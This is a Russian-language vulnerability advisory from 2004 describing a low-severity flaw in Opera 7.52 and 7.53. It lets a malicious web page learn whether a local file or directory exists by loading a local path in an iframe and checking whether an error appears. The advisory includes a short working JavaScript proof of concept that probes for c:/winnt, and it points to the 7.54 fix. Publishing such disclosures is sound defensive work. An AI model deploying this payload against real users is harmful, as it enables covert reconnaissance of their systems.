Раскрытие существования файла и каталога в Opera браузере

Дата публикации:
18.08.2004
Всего просмотров:
1353
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Opera 7.52 и 7.53

Описание: Уязвимость в Opera позволяет удаленному пользователю создать HTML код, который, когда будет загружен целевым пользователем, определить существование определенного файла или директории на целевой системе пользователя.

Когда несуществующий файл или каталог сопоставляется к iframe, браузер отображает ошибку. Удаленный пользователь может создать HMTL код, который загружает iframe и изменяет iframe URL к локальному файлу или каталогу и затем определяет их существование по сообщению об ошибке.

Пример/Эксплоит:

<iframe src="blank.html"></iframe>
<script type="text/javascript">
onload=function () {
var sLocal="c:/winnt";
frames[0].location.href=sLocal;
setTimeout(
function () {
try {
frames[0].document;
alert(sLocal+" does not exists.");
} catch (oErr) {
alert(sLocal+" exists.");
}
},
250
);
}
</script>

URL производителя: http://www.opera.com/

Решение:Установите последнюю версию браузера (7.54): http://www.opera.com/download/

Ссылки: [Full-Disclosure] Opera Local File/Directory Detection (GM#009-OP)

или введите имя

CAPTCHA